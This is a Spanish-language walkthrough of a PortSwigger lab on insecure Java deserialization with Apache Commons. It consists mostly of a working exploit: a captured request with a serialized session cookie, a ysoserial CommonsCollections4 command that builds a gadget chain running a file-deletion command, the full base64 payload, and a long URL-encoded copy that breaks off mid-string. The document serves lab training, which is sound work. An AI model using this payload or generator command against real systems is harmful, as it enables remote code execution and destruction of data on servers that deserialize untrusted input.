Deserialización Insegura Java (LAB)

Lab: Exploiting Java deserialization with Apache Commons

URL =

Cuando estemos dentro del laboratorio tendremos que abrir BurpSuite para prepararlo para capturar las peticiones que se vaya a realizar dentro del laboratorio.

Para poder empezar con la vulnerabilidad tendremos que capturar la peticion con BurpSuite recargando la pagina una vez que nos hayamos logueado.

Deberemos de introducir las credenciales que nos da PortSwigger:

User: wiener
Pass: peter

Una vez dentro, con BurpSuite capturaremos la peticion de login le daremos una vez a Forward y veremos lo siguiente:

GET /my-account?id=wiener HTTP/2
Host: 0a59004a03268b74811f8bb700ce0086.web-security-academy.net
Cookie: session=rO0ABXNyAC9sYWIuYWN0aW9ucy5jb21tb24uc2VyaWFsaXphYmxlLkFjY2Vzc1Rva2VuVXNlchlR/OUSJ6mBAgACTAALYWNjZXNzVG9rZW50ABJMamF2YS9sYW5nL1N0cmluZztMAAh1c2VybmFtZXEAfgABeHB0ACBoNXBwZWM4Yzd0ZDdycWNobXpycm53MHV2MzhtNXB5Y3QABndpZW5lcg%3d%3d
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not(A:Brand";v="99", "Google Chrome";v="133", "Chromium";v="133"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Referer: https://0a59004a03268b74811f8bb700ce0086.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=0, i

Vemos en la parte de Cookie: session= que esta nuestro codigo serializado en cual sabemos que es vulnerable, por lo que utilizaremos la siguiente herramienta para serializar el comando que queremos ejecutar de la siguiente forma:

Generar payload serializado

java \
   --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
   --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
   --add-opens=java.base/java.net=ALL-UNNAMED \
   --add-opens=java.base/java.util=ALL-UNNAMED \
   -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64

Info:

rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBh
cmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAQm9yZy5hcGFjaGUuY29tbW9u
cy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuVHJhbnNmb3JtaW5nQ29tcGFyYXRvci/5hPArsQjM
AgACTAAJZGVjb3JhdGVkcQB+AAFMAAt0cmFuc2Zvcm1lcnQALUxvcmcvYXBhY2hlL2NvbW1vbnMv
Y29sbGVjdGlvbnM0L1RyYW5zZm9ybWVyO3hwc3IAQG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0
aW9uczQuY29tcGFyYXRvcnMuQ29tcGFyYWJsZUNvbXBhcmF0b3L79JkluG6xNwIAAHhwc3IAO29y
Zy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVy
MMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAuW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVj
dGlvbnM0L1RyYW5zZm9ybWVyO3hwdXIALltMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25z
NC5UcmFuc2Zvcm1lcjs5gTr7CNo/pQIAAHhwAAAAAnNyADxvcmcuYXBhY2hlLmNvbW1vbnMuY29s
bGVjdGlvbnM0LmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25z
dGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAN2NvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5p
bnRlcm5hbC54c2x0Yy50cmF4LlRyQVhGaWx0ZXIAAAAAAAAAAAAAAHhwc3IAP29yZy5hcGFjaGUu
Y29tbW9ucy5jb2xsZWN0aW9uczQuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H+k
htA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGph
dmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFz
cgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVz
SW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVj
b2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAUTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFf
b3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tb
Qkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABq7K/rq+AAAAMgA5CgADACIH
ADcHACUHACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4B
AAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRh
YmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNsYXNzZXMBADVMeXNvc2Vy
aWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9y
bQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9z
dW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxl
cjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0
Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2Vy
aWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3Vu
L29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUv
eG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwv
aW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1
TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdo
YW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJp
YWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHACgBADN5
c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQBAEBjb20v
c3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5z
bGV0AQAUamF2YS9pby9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50
ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9H
YWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUo
KUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQAacm0gL2hvbWUvY2FybG9zL21vcmFsZS50
eHQIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAy
ADMKACsANAEADVN0YWNrTWFwVGFibGUBAB15c29zZXJpYWwvUHduZXIxMDQzNDk0NjM1NDQ0NgEA
H0x5c29zZXJpYWwvUHduZXIxMDQzNDk0NjM1NDQ0NjsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAA
AgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEA
AAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMA
AAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAE
AAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAd
AAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1
V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAl1cQB+AB8AAAHUyv66vgAA
ADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVl
BXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2Fs
VmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3Bh
eWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgAL
BwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2Jq
ZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRn
ZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3
AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQAC
ABYAEAAJcHQABFB3bnJwdwEAeHVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAA
AXZyAB1qYXZheC54bWwudHJhbnNmb3JtLlRlbXBsYXRlcwAAAAAAAAAAAAAAeHB3BAAAAANzcgAR
amF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKG
rJUdC5TgiwIAAHhwAAAAAXEAfgApeA==

Codificar payload serializado en URLCode

Obtendremos este codigo en Base64 ahora para que no nos de ningun error lo pasaremos a URLCode viendose asi:

%72%4f%30%41%42%58%4e%79%41%42%64%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%55%48%4a%70%62%33%4a%70%64%48%6c%52%64%57%56%31%5a%5a%54%61%4d%4c%54%37%50%34%4b%78%41%77%41%43%53%51%41%45%63%32%6c%36%5a%55%77%41%43%6d%4e%76%62%58%42%68%0a%63%6d%46%30%62%33%4a%30%41%42%5a%4d%61%6d%46%32%59%53%39%31%64%47%6c%73%4c%30%4e%76%62%58%42%68%63%6d%46%30%62%33%49%37%65%48%41%41%41%41%41%43%63%33%49%41%51%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%0a%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%59%32%39%74%63%47%46%79%59%58%52%76%63%6e%4d%75%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%61%57%35%6e%51%32%39%74%63%47%46%79%59%58%52%76%63%69%2f%35%68%50%41%72%73%51%6a%4d%0a%41%67%41%43%54%41%41%4a%5a%47%56%6a%62%33%4a%68%64%47%56%6b%63%51%42%2b%41%41%46%4d%41%41%74%30%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6e%51%41%4c%55%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%0a%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%30%4c%31%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4f%33%68%77%63%33%49%41%51%47%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%0a%61%57%39%75%63%7a%51%75%59%32%39%74%63%47%46%79%59%58%52%76%63%6e%4d%75%51%32%39%74%63%47%46%79%59%57%4a%73%5a%55%4e%76%62%58%42%68%63%6d%46%30%62%33%4c%37%39%4a%6b%6c%75%47%36%78%4e%77%49%41%41%48%68%77%63%33%49%41%4f%32%39%79%0a%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%51%32%68%68%61%57%35%6c%5a%46%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%0a%4d%4d%65%58%37%43%68%36%6c%77%51%43%41%41%46%62%41%41%31%70%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%7a%64%41%41%75%57%30%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%59%32%39%73%62%47%56%6a%0a%64%47%6c%76%62%6e%4d%30%4c%31%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4f%33%68%77%64%58%49%41%4c%6c%74%4d%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%0a%4e%43%35%55%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6a%73%35%67%54%72%37%43%4e%6f%2f%70%51%49%41%41%48%68%77%41%41%41%41%41%6e%4e%79%41%44%78%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%0a%62%47%56%6a%64%47%6c%76%62%6e%4d%30%4c%6d%5a%31%62%6d%4e%30%62%33%4a%7a%4c%6b%4e%76%62%6e%4e%30%59%57%35%30%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%59%64%70%41%52%51%51%4b%78%6c%41%49%41%41%55%77%41%43%57%6c%44%62%32%35%7a%0a%64%47%46%75%64%48%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%54%32%4a%71%5a%57%4e%30%4f%33%68%77%64%6e%49%41%4e%32%4e%76%62%53%35%7a%64%57%34%75%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%34%59%57%78%68%62%69%35%70%0a%62%6e%52%6c%63%6d%35%68%62%43%35%34%63%32%78%30%59%79%35%30%63%6d%46%34%4c%6c%52%79%51%56%68%47%61%57%78%30%5a%58%49%41%41%41%41%41%41%41%41%41%41%41%41%41%41%48%68%77%63%33%49%41%50%32%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%0a%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%53%57%35%7a%64%47%46%75%64%47%6c%68%64%47%56%55%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6a%53%4c%39%48%2b%6b%0a%68%74%41%37%41%67%41%43%57%77%41%46%61%55%46%79%5a%33%4e%30%41%42%4e%62%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%50%59%6d%70%6c%59%33%51%37%57%77%41%4c%61%56%42%68%63%6d%46%74%56%48%6c%77%5a%58%4e%30%41%42%4a%62%54%47%70%68%0a%64%6d%45%76%62%47%46%75%5a%79%39%44%62%47%46%7a%63%7a%74%34%63%48%56%79%41%42%4e%62%54%47%70%68%64%6d%45%75%62%47%46%75%5a%79%35%50%59%6d%70%6c%59%33%51%37%6b%4d%35%59%6e%78%42%7a%4b%57%77%43%41%41%42%34%63%41%41%41%41%41%46%7a%0a%63%67%41%36%59%32%39%74%4c%6e%4e%31%62%69%35%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6e%68%68%62%47%46%75%4c%6d%6c%75%64%47%56%79%62%6d%46%73%4c%6e%68%7a%62%48%52%6a%4c%6e%52%79%59%58%67%75%56%47%56%74%63%47%78%68%64%47%56%7a%0a%53%57%31%77%62%41%6c%58%54%38%46%75%72%4b%73%7a%41%77%41%47%53%51%41%4e%58%32%6c%75%5a%47%56%75%64%45%35%31%62%57%4a%6c%63%6b%6b%41%44%6c%39%30%63%6d%46%75%63%32%78%6c%64%45%6c%75%5a%47%56%34%57%77%41%4b%58%32%4a%35%64%47%56%6a%0a%62%32%52%6c%63%33%51%41%41%31%74%62%51%6c%73%41%42%6c%39%6a%62%47%46%7a%63%33%45%41%66%67%41%55%54%41%41%46%58%32%35%68%62%57%56%30%41%42%4a%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%31%4e%30%63%6d%6c%75%5a%7a%74%4d%41%42%46%66%0a%62%33%56%30%63%48%56%30%55%48%4a%76%63%47%56%79%64%47%6c%6c%63%33%51%41%46%6b%78%71%59%58%5a%68%4c%33%56%30%61%57%77%76%55%48%4a%76%63%47%56%79%64%47%6c%6c%63%7a%74%34%63%41%41%41%41%41%44%2f%2f%2f%2f%2f%64%58%49%41%41%31%74%62%0a%51%6b%76%39%47%52%56%6e%5a%39%73%33%41%67%41%41%65%48%41%41%41%41%41%43%64%58%49%41%41%6c%74%43%72%50%4d%58%2b%41%59%49%56%4f%41%43%41%41%42%34%63%41%41%41%42%71%37%4b%2f%72%71%2b%41%41%41%41%4d%67%41%35%43%67%41%44%41%43%49%48%0a%41%44%63%48%41%43%55%48%41%43%59%42%41%42%42%7a%5a%58%4a%70%59%57%78%57%5a%58%4a%7a%61%57%39%75%56%55%6c%45%41%51%41%42%53%67%45%41%44%55%4e%76%62%6e%4e%30%59%57%35%30%56%6d%46%73%64%57%55%46%72%53%43%54%38%35%48%64%37%7a%34%42%0a%41%41%59%38%61%57%35%70%64%44%34%42%41%41%4d%6f%4b%56%59%42%41%41%52%44%62%32%52%6c%41%51%41%50%54%47%6c%75%5a%55%35%31%62%57%4a%6c%63%6c%52%68%59%6d%78%6c%41%51%41%53%54%47%39%6a%59%57%78%57%59%58%4a%70%59%57%4a%73%5a%56%52%68%0a%59%6d%78%6c%41%51%41%45%64%47%68%70%63%77%45%41%45%31%4e%30%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%42%41%41%78%4a%62%6d%35%6c%63%6b%4e%73%59%58%4e%7a%5a%58%4d%42%41%44%56%4d%65%58%4e%76%63%32%56%79%0a%61%57%46%73%4c%33%42%68%65%57%78%76%59%57%52%7a%4c%33%56%30%61%57%77%76%52%32%46%6b%5a%32%56%30%63%79%52%54%64%48%56%69%56%48%4a%68%62%6e%4e%73%5a%58%52%51%59%58%6c%73%62%32%46%6b%4f%77%45%41%43%58%52%79%59%57%35%7a%5a%6d%39%79%0a%62%51%45%41%63%69%68%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%68%62%47%46%75%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%33%68%7a%62%48%52%6a%4c%30%52%50%54%54%74%62%54%47%4e%76%62%53%39%7a%0a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%63%32%56%79%61%57%46%73%61%58%70%6c%63%69%39%54%5a%58%4a%70%59%57%78%70%65%6d%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%0a%63%6a%73%70%56%67%45%41%43%47%52%76%59%33%56%74%5a%57%35%30%41%51%41%74%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%0a%59%79%39%45%54%30%30%37%41%51%41%49%61%47%46%75%5a%47%78%6c%63%6e%4d%42%41%45%4a%62%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%63%32%56%79%0a%61%57%46%73%61%58%70%6c%63%69%39%54%5a%58%4a%70%59%57%78%70%65%6d%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6a%73%42%41%41%70%46%65%47%4e%6c%63%48%52%70%62%32%35%7a%42%77%41%6e%41%51%43%6d%4b%45%78%6a%62%32%30%76%63%33%56%75%0a%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%52%45%39%4e%4f%30%78%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%0a%65%47%31%73%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%32%52%30%62%53%39%45%56%45%31%42%65%47%6c%7a%53%58%52%6c%63%6d%46%30%62%33%49%37%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%0a%61%57%35%30%5a%58%4a%75%59%57%77%76%63%32%56%79%61%57%46%73%61%58%70%6c%63%69%39%54%5a%58%4a%70%59%57%78%70%65%6d%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6a%73%70%56%67%45%41%43%47%6c%30%5a%58%4a%68%64%47%39%79%41%51%41%31%0a%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%5a%48%52%74%4c%30%52%55%54%55%46%34%61%58%4e%4a%64%47%56%79%59%58%52%76%63%6a%73%42%41%41%64%6f%0a%59%57%35%6b%62%47%56%79%41%51%42%42%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%63%32%56%79%61%57%46%73%61%58%70%6c%63%69%39%54%5a%58%4a%70%0a%59%57%78%70%65%6d%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6a%73%42%41%41%70%54%62%33%56%79%59%32%56%47%61%57%78%6c%41%51%41%4d%52%32%46%6b%5a%32%56%30%63%79%35%71%59%58%5a%68%44%41%41%4b%41%41%73%48%41%43%67%42%41%44%4e%35%0a%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%46%4e%30%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%42%41%45%42%6a%62%32%30%76%0a%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%63%6e%56%75%64%47%6c%74%5a%53%39%42%59%6e%4e%30%63%6d%46%6a%64%46%52%79%59%57%35%7a%0a%62%47%56%30%41%51%41%55%61%6d%46%32%59%53%39%70%62%79%39%54%5a%58%4a%70%59%57%78%70%65%6d%46%69%62%47%55%42%41%44%6c%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%0a%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%56%48%4a%68%62%6e%4e%73%5a%58%52%46%65%47%4e%6c%63%48%52%70%62%32%34%42%41%42%39%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%0a%59%57%52%6e%5a%58%52%7a%41%51%41%49%50%47%4e%73%61%57%35%70%64%44%34%42%41%42%46%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%6e%56%75%64%47%6c%74%5a%51%63%41%4b%67%45%41%43%6d%64%6c%64%46%4a%31%62%6e%52%70%62%57%55%42%41%42%55%6f%0a%4b%55%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%6e%56%75%64%47%6c%74%5a%54%73%4d%41%43%77%41%4c%51%6f%41%4b%77%41%75%41%51%41%61%63%6d%30%67%4c%32%68%76%62%57%55%76%59%32%46%79%62%47%39%7a%4c%32%31%76%63%6d%46%73%5a%53%35%30%0a%65%48%51%49%41%44%41%42%41%41%52%6c%65%47%56%6a%41%51%41%6e%4b%45%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%33%52%79%61%57%35%6e%4f%79%6c%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%31%42%79%62%32%4e%6c%63%33%4d%37%44%41%41%79%0a%41%44%4d%4b%41%43%73%41%4e%41%45%41%44%56%4e%30%59%57%4e%72%54%57%46%77%56%47%46%69%62%47%55%42%41%42%31%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%4d%44%51%7a%4e%44%6b%30%4e%6a%4d%31%4e%44%51%30%4e%67%45%41%0a%48%30%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%4d%44%51%7a%4e%44%6b%30%4e%6a%4d%31%4e%44%51%30%4e%6a%73%41%49%51%41%43%41%41%4d%41%41%51%41%45%41%41%45%41%47%67%41%46%41%41%59%41%41%51%41%48%41%41%41%41%0a%41%67%41%49%41%41%51%41%41%51%41%4b%41%41%73%41%41%51%41%4d%41%41%41%41%4c%77%41%42%41%41%45%41%41%41%41%46%4b%72%63%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%76%41%41%34%41%41%41%41%4d%41%41%45%41%0a%41%41%41%46%41%41%38%41%4f%41%41%41%41%41%45%41%45%77%41%55%41%41%49%41%44%41%41%41%41%44%38%41%41%41%41%44%41%41%41%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%30%41%41%34%41%41%41%41%67%41%41%4d%41%0a%41%41%41%42%41%41%38%41%4f%41%41%41%41%41%41%41%41%51%41%56%41%42%59%41%41%51%41%41%41%41%45%41%46%77%41%59%41%41%49%41%47%51%41%41%41%41%51%41%41%51%41%61%41%41%45%41%45%77%41%62%41%41%49%41%44%41%41%41%41%45%6b%41%41%41%41%45%0a%41%41%41%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%34%41%41%34%41%41%41%41%71%41%41%51%41%41%41%41%42%41%41%38%41%4f%41%41%41%41%41%41%41%41%51%41%56%41%42%59%41%41%51%41%41%41%41%45%41%48%41%41%64%0a%41%41%49%41%41%41%41%42%41%42%34%41%48%77%41%44%41%42%6b%41%41%41%41%45%41%41%45%41%47%67%41%49%41%43%6b%41%43%77%41%42%41%41%77%41%41%41%41%6b%41%41%4d%41%41%67%41%41%41%41%2b%6e%41%41%4d%42%54%4c%67%41%4c%78%49%78%74%67%41%31%0a%56%37%45%41%41%41%41%42%41%44%59%41%41%41%41%44%41%41%45%44%41%41%49%41%49%41%41%41%41%41%49%41%49%51%41%52%41%41%41%41%43%67%41%42%41%41%49%41%49%77%41%51%41%41%6c%31%63%51%42%2b%41%42%38%41%41%41%48%55%79%76%36%36%76%67%41%41%0a%41%44%49%41%47%77%6f%41%41%77%41%56%42%77%41%58%42%77%41%59%42%77%41%5a%41%51%41%51%63%32%56%79%61%57%46%73%56%6d%56%79%63%32%6c%76%62%6c%56%4a%52%41%45%41%41%55%6f%42%41%41%31%44%62%32%35%7a%64%47%46%75%64%46%5a%68%62%48%56%6c%0a%42%58%48%6d%61%65%34%38%62%55%63%59%41%51%41%47%50%47%6c%75%61%58%51%2b%41%51%41%44%4b%43%6c%57%41%51%41%45%51%32%39%6b%5a%51%45%41%44%30%78%70%62%6d%56%4f%64%57%31%69%5a%58%4a%55%59%57%4a%73%5a%51%45%41%45%6b%78%76%59%32%46%73%0a%56%6d%46%79%61%57%46%69%62%47%56%55%59%57%4a%73%5a%51%45%41%42%48%52%6f%61%58%4d%42%41%41%4e%47%62%32%38%42%41%41%78%4a%62%6d%35%6c%63%6b%4e%73%59%58%4e%7a%5a%58%4d%42%41%43%56%4d%65%58%4e%76%63%32%56%79%61%57%46%73%4c%33%42%68%0a%65%57%78%76%59%57%52%7a%4c%